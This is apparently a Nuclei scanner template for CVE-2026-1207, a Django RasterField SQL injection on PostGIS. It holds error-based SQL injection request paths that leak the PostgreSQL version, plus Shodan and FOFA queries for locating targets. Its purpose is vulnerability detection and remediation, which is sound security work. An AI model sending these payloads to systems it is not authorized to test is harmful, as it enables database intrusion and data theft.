id: CVE-2026-1207

info:
  name: Django RasterField - SQL Injection
  author: omarkurt
  severity: high
  description: |
    Django < 6.0.2, < 5.2.11, and < 4.2.28 contains a SQL injection caused by improper sanitization of the band index parameter in RasterField on PostGIS, letting remote attackers inject SQL, exploit requires crafted input.
  impact: |
    Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
  remediation: |
    Upgrade to versions 6.0.2, 5.2.11, 4.2.28 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1207
    - https://www.djangoproject.com/weblog/2026/feb/03/security-releases/
    - https://github.com/django/django/commit/81aa5292967cd09319c45fe2c1a525ce7b6684d8
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 8.1
    cve-id: CVE-2026-1207
    epss-score: 0.05295
    epss-percentile: 0.90183
    cwe-id: CWE-89
    cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: djangoproject
    product: django
    shodan-query: 'django'
    fofa-query: 'app="Django"'
  tags: cve,cve2026,django,sqli,postgis,rasterfield,vuln,unauth,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"
      - "{{BaseURL}}/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, "invalid input syntax for type integer", "PostgreSQL")'
        condition: and

    extractors:
      - type: regex
        name: postgres_version
        part: body
        group: 1
        regex:
          - 'PostgreSQL ([0-9]+\.[0-9]+)'
# digest: 4b0a0048304602210098abe0f0feb183b625f86a9d1948b75b9ae8a29c8acff523926ffeb7cf2011060221009dd003c332211b8b7b9c1e0a02bb2450ee2134e90e5da99ea55ef5147940f8dd:922c64590222798bb761d5b6d8e72950